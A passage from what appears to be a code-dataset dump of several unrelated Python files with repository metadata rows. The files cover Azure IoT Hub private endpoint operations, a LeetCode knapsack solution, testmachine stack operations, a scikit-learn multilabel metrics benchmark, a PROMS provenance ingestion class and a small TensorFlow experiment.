"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties.
Required.
:type private_endpoint_connection: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
resource_name: str,
private_endpoint_connection_name: str,
private_endpoint_connection: Union[_models.PrivateEndpointConnection, IO],
**kwargs: Any
) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
"""Update private endpoint connection.
Update the status of a private endpoint connection with the specified name.
:param resource_group_name: The name of the resource group that contains the IoT hub. Required.
:type resource_group_name: str
:param resource_name: The name of the IoT hub. Required.
:type resource_name: str
:param private_endpoint_connection_name: The name of the private endpoint connection. Required.
:type private_endpoint_connection_name: str
:param private_endpoint_connection: The private endpoint connection with updated properties. Is
either a PrivateEndpointConnection type or a IO type. Required.
:type private_endpoint_connection:
~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2022-04-30-preview"] = kwargs.pop(
"api_version", _params.pop("api-version", "2022-04-30-preview")
)
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
cont_token: Optional[str] = kwargs.pop("continuation_token", None)
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
resource_name=resource_name,
private_endpoint_connection_name=private_endpoint_connection_name,
private_endpoint_connection=private_endpoint_connection,
api_version=api_version,
content_type=content_type,
cls=lambda x, y, z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop("error_map", None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
elif polling is False:
polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
else:
polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output,
)
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method) # type: ignore
begin_update.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
}
    async def _delete_initial(
        self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
    ) -> Optional[_models.PrivateEndpointConnection]:
        """Send the initial DELETE request for a private endpoint connection.

        Returns the deserialized connection for 200/202 responses, ``None``
        for 204, and raises :class:`HttpResponseError` for any other status.
        This is the first leg of the long-running delete; polling is handled
        by :meth:`begin_delete`.
        """
        # Map well-known HTTP failures to typed exceptions; callers may
        # extend or override the mapping via an ``error_map`` kwarg.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # The query-string "api-version" wins over the keyword argument default.
        api_version: Literal["2022-04-30-preview"] = kwargs.pop(
            "api_version", _params.pop("api-version", "2022-04-30-preview")
        )
        cls: ClsType[Optional[_models.PrivateEndpointConnection]] = kwargs.pop("cls", None)
        request = build_delete_request(
            resource_group_name=resource_group_name,
            resource_name=resource_name,
            private_endpoint_connection_name=private_endpoint_connection_name,
            subscription_id=self._config.subscription_id,
            api_version=api_version,
            template_url=self._delete_initial.metadata["url"],
            headers=_headers,
            params=_params,
        )
        request = _convert_request(request)
        request.url = self._client.format_url(request.url)
        pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
            request, stream=False, **kwargs
        )
        response = pipeline_response.http_response
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
        # 204 leaves ``deserialized`` as None; 202 additionally surfaces the
        # Azure-AsyncOperation header used to poll the operation.
        deserialized = None
        response_headers = {}
        if response.status_code == 200:
            deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
        if response.status_code == 202:
            response_headers["Azure-AsyncOperation"] = self._deserialize(
                "str", response.headers.get("Azure-AsyncOperation")
            )
            deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, response_headers)
        return deserialized
    _delete_initial.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
    }
    @distributed_trace_async
    async def begin_delete(
        self, resource_group_name: str, resource_name: str, private_endpoint_connection_name: str, **kwargs: Any
    ) -> AsyncLROPoller[_models.PrivateEndpointConnection]:
        """Delete private endpoint connection.
        Delete private endpoint connection with the specified name.
        :param resource_group_name: The name of the resource group that contains the IoT hub. Required.
        :type resource_group_name: str
        :param resource_name: The name of the IoT hub. Required.
        :type resource_name: str
        :param private_endpoint_connection_name: The name of the private endpoint connection. Required.
        :type private_endpoint_connection_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
         this operation to not poll, or pass in your own initialized polling object for a personal
         polling strategy.
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no
         Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either PrivateEndpointConnection or the
         result of cls(response)
        :rtype:
         ~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothub.v2022_04_30_preview.models.PrivateEndpointConnection]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        api_version: Literal["2022-04-30-preview"] = kwargs.pop(
            "api_version", _params.pop("api-version", "2022-04-30-preview")
        )
        cls: ClsType[_models.PrivateEndpointConnection] = kwargs.pop("cls", None)
        polling: Union[bool, AsyncPollingMethod] = kwargs.pop("polling", True)
        lro_delay = kwargs.pop("polling_interval", self._config.polling_interval)
        cont_token: Optional[str] = kwargs.pop("continuation_token", None)
        # Only issue the initial DELETE when we are not resuming an existing
        # operation from a continuation token.
        if cont_token is None:
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                resource_name=resource_name,
                private_endpoint_connection_name=private_endpoint_connection_name,
                api_version=api_version,
                cls=lambda x, y, z: x,  # keep the raw pipeline response for the poller
                headers=_headers,
                params=_params,
                **kwargs
            )
        kwargs.pop("error_map", None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final response once the LRO completes.
            deserialized = self._deserialize("PrivateEndpointConnection", pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        # ``polling`` may be True (default ARM polling), False (no polling),
        # or a caller-provided AsyncPollingMethod instance.
        if polling is True:
            polling_method: AsyncPollingMethod = cast(AsyncPollingMethod, AsyncARMPolling(lro_delay, **kwargs))
        elif polling is False:
            polling_method = cast(AsyncPollingMethod, AsyncNoPolling())
        else:
            polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output,
            )
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)  # type: ignore
    begin_delete.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/iotHubs/{resourceName}/privateEndpointConnections/{privateEndpointConnectionName}"
    }
| [
"noreply@github.com"
] | kurtzeborn.noreply@github.com |
6b40833fba82cb85808e5f9f3fbb03fa0177cdfa | 03d07de94fc22d1583c45ca84c711a06df8a40ff | /lc/dynamic_programming/lc_474_ones-and-zeroes.py | 92e6f2fda2baa84c8f8040ccba0e83ef0384d9a7 | [] | no_license | gaopenghigh/algorithm | 94e04293c69a2ad6903495e1cf6e1b75556535bb | f5d78c98c7201c56f9d4c3a9c0c76e9447a17985 | refs/heads/master | 2022-03-11T18:46:38.712923 | 2022-02-20T14:20:54 | 2022-02-20T14:20:54 | 54,484,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,416 | py | # 474. 一和零
# 给你一个二进制字符串数组 strs 和两个整数 m 和 n 。
# 请你找出并返回 strs 的最大子集的长度,该子集中 最多 有 m 个 0 和 n 个 1 。
# 如果 x 的所有元素也是 y 的元素,集合 x 是集合 y 的 子集 。
#
# 示例 1:
# 输入:strs = ["10", "0001", "111001", "1", "0"], m = 5, n = 3
# 输出:4
# 解释:最多有 5 个 0 和 3 个 1 的最大子集是 {"10","0001","1","0"} ,因此答案是 4 。
# 其他满足题意但较小的子集包括 {"0001","1"} 和 {"10","1","0"} 。{"111001"} 不满足题意,因为它含 4 个 1 ,大于 n 的值 3 。
#
# 示例 2:
# 输入:strs = ["10", "0", "1"], m = 1, n = 1
# 输出:2
# 解释:最大的子集是 {"0", "1"} ,所以答案是 2 。
#
# 提示:
# 1 <= strs.length <= 600
# 1 <= strs[i].length <= 100
# strs[i] 仅由 '0' 和 '1' 组成
# 1 <= m, n <= 100
# dp[i][j][k] 中 i, j 和 k 描述状态,从前 i 个元素中选择满足要求的最大子集,其中最多有 j 个 0 和 k 个 1
# i 的最大值为 len(strs), j 和 k 的最大值为 m 和 n
# base case: dp[0][x][x] = 0
# 假设 strs[i] 有 x 个 '0' 和 y 个 '1'
# 如果最终的最大子集中包含了 strs[i],则 dp[i][j][k] = 1 + dp[i-1][j-x][k-y]
# 如果最大子集中不包含 strs[i],则 dp[i][j][k] = dp[i-1][j][k]
# 取其中的最大值作为 dp[i][j][k] 的值
# 最终的答案就是 dp[len(strs)][m][n]
class Solution:
    def findMaxForm(self, strs: list[str], m: int, n: int) -> int:
        """Return the size of the largest subset of ``strs`` whose strings
        use at most ``m`` zeros and ``n`` ones in total.

        This is a 0/1 knapsack with a two-dimensional capacity (zeros, ones).
        The original 3-D table ``dp[i][j][k]`` is compressed to a 2-D table
        by iterating the capacities in reverse, so each string is considered
        at most once per state.

        Time O(len(strs) * m * n); space O(m * n) instead of
        O(len(strs) * m * n).
        """
        # dp[j][k]: best subset size using at most j zeros and k ones.
        dp = [[0] * (n + 1) for _ in range(m + 1)]
        for s in strs:
            zeros = s.count('0')      # idiomatic count, avoids a throwaway list
            ones = len(s) - zeros
            # Reverse order keeps dp[j - zeros][k - ones] referring to the
            # state *before* this string was considered (0/1 knapsack invariant).
            for j in range(m, zeros - 1, -1):
                for k in range(n, ones - 1, -1):
                    # Either skip the string (dp[j][k]) or take it.
                    dp[j][k] = max(dp[j][k], 1 + dp[j - zeros][k - ones])
        return dp[m][n]
if __name__ == '__main__':
    # Smoke-test with the example from the problem statement (expected: 4).
    sample = ["10", "0001", "111001", "1", "0"]
    zero_budget, one_budget = 5, 3
    print(Solution().findMaxForm(sample, zero_budget, one_budget))
"jh.gao@ucloud.cn"
] | jh.gao@ucloud.cn |
9b596c719b030f28eac270a22b939f7f9af7eb1b | 5e9de302964b59ccd74aa3d62d4786c87ca60108 | /testmachine/common.py | cc5324bbe50a67ea2ea0b142239a1e4783349923 | [
"BSD-2-Clause"
] | permissive | cid-aaron/testmachine | 6c409d356ae3a3dc45d0ab35c8954d92cb57b4bf | dc207986b0d2d74241842472c80e98dd9f536e7d | refs/heads/master | 2020-05-20T16:52:40.615042 | 2014-01-11T12:26:14 | 2014-01-11T12:26:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,383 | py | import operator
from .operations import (
Drop,
Swap,
Rot,
BinaryOperator,
UnaryOperator,
ReadAndWrite,
Check,
PushRandom,
)
def operation(*args, **kwargs):
    """
    Add an operation which pops arguments from each of the varstacks named
    in args, passes the result in that order to function and pushes the
    result of the invocation onto target. If target is None the result is
    ignored.
    """
    # Thin factory: all argument validation and semantics live in ReadAndWrite.
    return ReadAndWrite(
        *args, **kwargs
    )
def binary_operation(*args, **kwargs):
    """Build an operation that combines the top two values of a varstack."""
    return BinaryOperator(*args, **kwargs)
def unary_operation(operation, varstack, name):
    """Build an operation applying ``operation`` to the top of ``varstack``."""
    return UnaryOperator(operation, varstack, name)
def check(*args, **kwargs):
    """
    Add an operation which reads from the varstacks in args in order,
    without popping their result and passes them in order to test. If test
    returns something truthy this operation passes, else it will fail.
    """
    # Checks only peek at the stacks; they never mutate machine state.
    return Check(*args, **kwargs)
def generate(*args, **kwargs):
    """
    Add a generator for operations which produces values by calling
    produce with a Random instance and pushes them onto target.
    """
    return PushRandom(*args, **kwargs)
def basic_operations(varstack):
    """Return the standard stack-shuffling operations for ``varstack``.

    These don't do anything very interesting on their own, but by moving
    data around they widen the range of programs that can be generated,
    so most testmachines want them on most varstacks.
    """
    shufflers = (Drop, Swap, Rot)
    return tuple(factory(varstack) for factory in shufflers)
def arithmetic_operations(varstack):
    """Return integer arithmetic operations on ``varstack``.

    Elements may be combined with +, - and *, and negated with unary -.
    """
    combiners = [
        (operator.add, "+"),
        (operator.sub, "-"),
        (operator.mul, "*"),
    ]
    ops = [binary_operation(fn, varstack, symbol) for fn, symbol in combiners]
    ops.append(unary_operation(operator.neg, varstack, "-"))
    return tuple(ops)
def ints(target="ints"):
    """Convenience bundle of operations that fill ``target`` with ints.

    Adds the basic stack shuffles, integer arithmetic, and two random
    generators: a large non-negative range and a small signed range.
    """
    random_sources = (
        generate(lambda rng: rng.randint(0, 10 ** 6), target),
        generate(lambda rng: rng.randint(-10, 10), target),
    )
    return (basic_operations(target), arithmetic_operations(target)) + random_sources
def lists(source, target):
    """
    Operations which populate target with lists whose elements come from source
    """
    return (
        basic_operations(target),
        # Fresh empty list; the lambda ignores the Random instance.
        generate(lambda r: [], target),
        # In-place append: consumes a list and an element, pushes nothing
        # (target=None); ``pattern`` is how the step is rendered in programs.
        operation(
            function=lambda x, y: x.append(y),
            argspec=(target, source),
            target=None,
            name="append",
            pattern="{0}.append({1})"
        ),
        # Wrap one element as a one-item list.
        operation(
            function=lambda x: [x],
            argspec=(source,),
            target=target,
            name="singleton",
            pattern="[{0}]",
        ),
        # Wrap two elements as a two-item list.
        operation(
            function=lambda x, y: [x, y],
            argspec=(source, source),
            target=target,
            name="pair",
            pattern="[{0}, {1}]",
        ),
        # Shallow copy of an existing list.
        operation(
            function=list,
            argspec=(target,),
            target=target
        ),
        # List concatenation.
        binary_operation(operator.add, target, "+"),
    )
| [
"david@drmaciver.com"
] | david@drmaciver.com |
77cbdfeadabbc31c5a1c4debe0f00849f53dbac8 | ae71e532468e861e3a9fcb90f613eddca267ace6 | /routes/class_incoming.py | f2d93f0a50f1963382d3895bbaf47dcf3e2de6e0 | [
"CC-BY-4.0"
] | permissive | soon14/proms-4.0 | 0b4ed398125e529c13dc8f0d9b0c14e0348ae5c6 | 6c3a1fd62c9394761664e100fc1dde50fd79dc11 | refs/heads/master | 2020-09-23T20:33:56.716317 | 2019-06-09T04:01:29 | 2019-06-09T04:01:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py | from abc import ABCMeta, abstractmethod
import database
from . import w_l
class IncomingClass(metaclass=ABCMeta):
    """Base class for items posted to PROMS.

    Subclasses must implement :meth:`valid` and :meth:`determine_uri` and
    populate ``graph`` / ``named_graph_uri`` before calling :meth:`stored`.
    ``error_messages`` is always either ``None`` or a list of strings.
    """

    @abstractmethod
    def __init__(self, request):
        self.request = request
        self.graph = None              # rdflib Graph to persist
        self.uri = None                # URI assigned by determine_uri()
        self.named_graph_uri = None    # named graph the triples are stored under
        self.error_messages = None     # None or list[str]

    @abstractmethod
    def valid(self):
        pass

    @abstractmethod
    def determine_uri(self):
        pass

    def stored(self):
        """Add this item to PROMS.

        Returns True on success; on failure returns False and records the
        reason(s) in ``self.error_messages`` (a list of strings).
        """
        if self.graph is None or self.named_graph_uri is None:
            # Fixed typo ("named_grapoh_uri") and keep error_messages a list,
            # consistent with the exception branch below.
            msg = 'The graph and the named_graph_uri properties of this class instance must not be None when ' \
                  'trying to store this instance in the provenance DB.'
            self.error_messages = [msg]
            return False
        try:
            w_l(str(self.graph))
            w_l(str(self.named_graph_uri))
            database.insert(self.graph, self.named_graph_uri)
            return True
        except Exception as e:
            # Include the underlying error so failures are diagnosable.
            self.error_messages = ['Could not connect to the provenance database: {}'.format(e)]
            return False
| [
"m13001282105@163.com"
] | m13001282105@163.com |
1b720e6c3d0b7ff11d6d728118fb3c6214ec45a5 | 75cf6a9fd035883b64ca2309382e0178cf370b43 | /Empirical/python/sklearn/zdivers/benchmarks/bench_multilabel_metrics.py | 02a1fb8b5d83267d249892377574c05608ec6fba | [] | no_license | ygtfrdes/Program | 171b95b9f32a105185a7bf8ec6c8c1ca9d1eda9d | 1c1e30230f0df50733b160ca73510c41d777edb9 | refs/heads/master | 2022-10-08T13:13:17.861152 | 2019-11-06T04:53:27 | 2019-11-06T04:53:27 | 219,560,170 | 1 | 2 | null | 2022-09-30T19:51:17 | 2019-11-04T17:39:52 | HTML | UTF-8 | Python | false | false | 7,086 | py | #!/usr/bin/python
#!/usr/bin/env python
"""
A comparison of multilabel target formats and metrics over them
"""
from timeit import timeit
from functools import partial
import itertools
import argparse
import sys
import matplotlib.pyplot as plt
import scipy.sparse as sp
import numpy as np
from sklearn.datasets import make_multilabel_classification
from sklearn.metrics import (f1_score, accuracy_score, hamming_loss,
jaccard_similarity_score)
from sklearn.utils.testing import ignore_warnings
# Metric name -> callable(y_true, y_pred).  Averaging modes are bound up
# front with functools.partial so every entry shares the same signature.
METRICS = {
    'f1': partial(f1_score, average='micro'),
    'f1-by-sample': partial(f1_score, average='samples'),
    'accuracy': accuracy_score,
    'hamming': hamming_loss,
    'jaccard': jaccard_similarity_score,
}
# Format name -> converter from a dense indicator matrix to the
# representation under test ('dense' is the identity).
FORMATS = {
    'sequences': lambda y: [list(np.flatnonzero(s)) for s in y],
    'dense': lambda y: y,
    'csr': lambda y: sp.csr_matrix(y),
    'csc': lambda y: sp.csc_matrix(y),
}
@ignore_warnings
def benchmark(metrics=tuple(v for k, v in sorted(METRICS.items())),
              formats=tuple(v for k, v in sorted(FORMATS.items())),
              samples=1000, classes=4, density=.2,
              n_times=5):
    """Times metric calculations for a number of inputs
    Parameters
    ----------
    metrics : array-like of callables (1d or 0d)
        The metric functions to time.
    formats : array-like of callables (1d or 0d)
        These may transform a dense indicator matrix into multilabel
        representation.
    samples : array-like of ints (1d or 0d)
        The number of samples to generate as input.
    classes : array-like of ints (1d or 0d)
        The number of classes in the input.
    density : array-like of ints (1d or 0d)
        The density of positive labels in the input.
    n_times : int
        Time calling the metric n_times times.
    Returns
    -------
    array of floats shaped like (metrics, formats, samples, classes, density)
        Time in seconds.
    """
    # Scalars are promoted to 1-element arrays so the loops below are uniform.
    metrics = np.atleast_1d(metrics)
    samples = np.atleast_1d(samples)
    classes = np.atleast_1d(classes)
    density = np.atleast_1d(density)
    formats = np.atleast_1d(formats)
    out = np.zeros((len(metrics), len(formats), len(samples), len(classes),
                    len(density)), dtype=float)
    it = itertools.product(samples, classes, density)
    for i, (s, c, d) in enumerate(it):
        # Fixed random_state values keep the benchmark inputs reproducible
        # (and y_true / y_pred distinct from each other).
        _, y_true = make_multilabel_classification(n_samples=s, n_features=1,
                                                   n_classes=c, n_labels=d * c,
                                                   random_state=42)
        _, y_pred = make_multilabel_classification(n_samples=s, n_features=1,
                                                   n_classes=c, n_labels=d * c,
                                                   random_state=84)
        for j, f in enumerate(formats):
            f_true = f(y_true)
            f_pred = f(y_pred)
            for k, metric in enumerate(metrics):
                t = timeit(partial(metric, f_true, f_pred), number=n_times)
                # ``.flat[i]`` works because itertools.product enumerates
                # (samples, classes, density) in the same row-major order as
                # out's trailing three axes.
                out[k, j].flat[i] = t
    return out
def _tabulate(results, metrics, formats):
"""Prints results by metric and format
Uses the last ([-1]) value of other fields
"""
column_width = max(max(len(k) for k in formats) + 1, 8)
first_width = max(len(k) for k in metrics)
head_fmt = ('{:<{fw}s}' + '{:>{cw}s}' * len(formats))
row_fmt = ('{:<{fw}s}' + '{:>{cw}.3f}' * len(formats))
print(head_fmt.format('Metric', *formats,
cw=column_width, fw=first_width))
for metric, row in zip(metrics, results[:, :, -1, -1, -1]):
print(row_fmt.format(metric, *row,
cw=column_width, fw=first_width))
def _plot(results, metrics, formats, title, x_ticks, x_label,
          format_markers=('x', '|', 'o', '+'),
          metric_colors=('c', 'm', 'y', 'k', 'g', 'r', 'b')):
    """
    Plot the results by metric, format and some other variable given by
    x_label

    One line is drawn per (metric, format) pair: the marker encodes the
    format and the color encodes the metric (colors repeat if there are
    more metrics than colors).  Blocks until the plot window is closed.
    """
    fig = plt.figure('scikit-learn multilabel metrics benchmarks')
    plt.title(title)
    ax = fig.add_subplot(111)
    for i, metric in enumerate(metrics):
        # NOTE: the loop variable ``format`` shadows the builtin of the
        # same name within this function body.
        for j, format in enumerate(formats):
            ax.plot(x_ticks, results[i, j].flat,
                    label='{}, {}'.format(metric, format),
                    marker=format_markers[j],
                    color=metric_colors[i % len(metric_colors)])
    ax.set_xlabel(x_label)
    ax.set_ylabel('Time (s)')
    ax.legend()
    plt.show()
if __name__ == "__main__":
    ap = argparse.ArgumentParser()
    ap.add_argument('metrics', nargs='*', default=sorted(METRICS),
                    help='Specifies metrics to benchmark, defaults to all. '
                         'Choices are: {}'.format(sorted(METRICS)))
    ap.add_argument('--formats', nargs='+', choices=sorted(FORMATS),
                    help='Specifies multilabel formats to benchmark '
                         '(defaults to all).')
    ap.add_argument('--samples', type=int, default=1000,
                    help='The number of samples to generate')
    ap.add_argument('--classes', type=int, default=10,
                    help='The number of classes')
    ap.add_argument('--density', type=float, default=.2,
                    help='The average density of labels per sample')
    ap.add_argument('--plot', choices=['classes', 'density', 'samples'],
                    default=None,
                    help='Plot time with respect to this parameter varying '
                         'up to the specified value')
    ap.add_argument('--n-steps', default=10, type=int,
                    help='Plot this many points for each metric')
    ap.add_argument('--n-times',
                    default=5, type=int,
                    help="Time performance over n_times trials")
    args = ap.parse_args()
    if args.plot is not None:
        # Replace the scalar value of the plotted parameter with an array
        # of n_steps values so benchmark() sweeps it.
        max_val = getattr(args, args.plot)
        if args.plot in ('classes', 'samples'):
            min_val = 2
        else:
            min_val = 0
        steps = np.linspace(min_val, max_val, num=args.n_steps + 1)[1:]
        if args.plot in ('classes', 'samples'):
            # Counts must be integers; dedupe after rounding.
            steps = np.unique(np.round(steps).astype(int))
        setattr(args, args.plot, steps)
    if args.metrics is None:
        args.metrics = sorted(METRICS)
    if args.formats is None:
        args.formats = sorted(FORMATS)
    results = benchmark([METRICS[k] for k in args.metrics],
                        [FORMATS[k] for k in args.formats],
                        args.samples, args.classes, args.density,
                        args.n_times)
    _tabulate(results, args.metrics, args.formats)
    if args.plot is not None:
        print('Displaying plot', file=sys.stderr)
        title = ('Multilabel metrics with %s' %
                 ', '.join('{0}={1}'.format(field, getattr(args, field))
                           for field in ['samples', 'classes', 'density']
                           if args.plot != field))
        _plot(results, args.metrics, args.formats, title, steps, args.plot)
| [
"githubfortyuds@gmail.com"
] | githubfortyuds@gmail.com |
9108e76bcc9deddc6f24d53e3de93b4c57e58f2e | 3005ac0fbafc802212f788185138206f13b1103d | /PILtest/tests2018_4_7.py | d5ec97cc486ac983271e930705ee8380a446d523 | [] | no_license | Tony1886/python_workplace | a8903127d33d95c8e02e09dc2b4c4528a26561ad | 6d1b325ee060dda46e81e359b7ed1402d3f02bdf | refs/heads/master | 2020-05-24T15:09:50.366564 | 2019-05-18T06:51:03 | 2019-05-18T06:51:03 | 187,324,243 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,689 | py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 7 17:38:41 2018
@author: Tan Zhijie
"""
import numpy as np
import myFunction as mf
import tensorflow as tf
import matplotlib.pyplot as plt
# Generate m random binary "images" (1 x 64 rows) and take the Fourier
# transform of each; the network will try to recover the binary pattern
# from the transform's intensity.
M = 1
N = 64
m = 2000       # number of samples
n = M*N        # flattened length of one sample
Es = np.zeros((m,M,N))
Ir = np.zeros(np.shape(Es))
for i in range(m):
    Es[i] = np.random.randint(0,2,[M,N])
    # mf.mfft comes from the local myFunction module — presumably a 2-D
    # FFT wrapper; confirm against that module.
    Er = mf.mfft(Es[i])
    Ir[i] = abs(Er)**2   # intensity (squared magnitude) of the spectrum
# Y: binary targets; X: normalized intensities as network input.
Y = np.reshape(Es,[m,n])
X = np.reshape(Ir,[m,n])
X = X/np.max(X)
def compute_accuracy(v_xs,v_ys):
    """Evaluate argmax-match accuracy of the global ``prediction`` tensor.

    Relies on the module-level TF session ``sess`` and placeholders
    ``xs``/``ys`` defined below in this script.
    """
    global prediction
    y_pre = sess.run(prediction,feed_dict={xs:v_xs})
    # Fraction of samples whose argmax matches the target's argmax.
    correct_prediction = tf.equal(tf.argmax(y_pre,1), tf.argmax(v_ys,1))
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
    result = sess.run(accuracy,feed_dict={xs:v_xs,ys:v_ys})
    return result
# Build one fully connected neural-network layer.
def add_layer(inputs, in_size, out_size, activation=None):
    """Return the output tensor of a dense layer ``inputs @ W + b``.

    Args:
        inputs: 2-D tensor of shape (batch, in_size).
        in_size: number of input units.
        out_size: number of output units.
        activation: optional element-wise activation applied to the affine
            output; identity when None.
    """
    # Scale the random init by fan-in to keep initial activations small.
    W = tf.Variable(tf.random_normal([in_size, out_size]) / in_size, name='W')
    b = tf.Variable(tf.zeros([1, out_size]), name='b')
    Z = tf.matmul(inputs, W) + b
    # `is None` (identity test) is the idiomatic form, not `== None`.
    return Z if activation is None else activation(Z)
# define input
xs = tf.placeholder(tf.float32,[None,n])
ys = tf.placeholder(tf.float32,[None,n])
keep_drop = tf.placeholder(tf.float32)   # fed below but never wired into a dropout op
# add layers: n -> 10n -> 10n -> n, ReLU hidden layers, sigmoid output
layer = [n,10*n,10*n,n]
for i in range(len(layer)-1):
    if i == 0:
        l = add_layer(xs,layer[i],layer[i+1],activation=tf.nn.relu)
    elif i==len(layer)-2:
        prediction = add_layer(l,layer[i],layer[i+1], activation=tf.sigmoid)
    else:
        l = add_layer(l,layer[i],layer[i+1],activation=tf.nn.relu)
# loss function: cross-entropy (disabled alternative)
#loss = tf.reduce_mean(tf.reduce_sum(-ys*tf.log(prediction),
#                                    reduction_indices = [1]))
# loss function: mean squared error
loss = tf.reduce_mean(tf.reduce_sum(tf.square(ys-prediction),
                                    reduction_indices = [1]))
train = tf.train.GradientDescentOptimizer(0.1).minimize(loss)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for i in range(500):
    sess.run(train,feed_dict = {xs:X,ys:Y,keep_drop:0.5})
    if i%50 == 0:
        print(compute_accuracy(X, Y))
# Compare the reconstruction for one arbitrary sample against its target.
test = 0
result = sess.run(prediction,feed_dict={xs:X[test].reshape([1,n])})
# NOTE(review): ``plt.figure`` is missing "()" — this line is a no-op
# attribute access; confirm whether a new figure was intended.
plt.figure
#plt.subplot(121)
#plt.imshow(result.reshape([8,8]))
plt.scatter(np.linspace(1,64,64),result)
#plt.subplot(122)
#plt.imshow(Es[test])
plt.scatter(np.linspace(1,64,64),Y[test],c = 'r')   # target in red
plt.show()
"="
] | = |
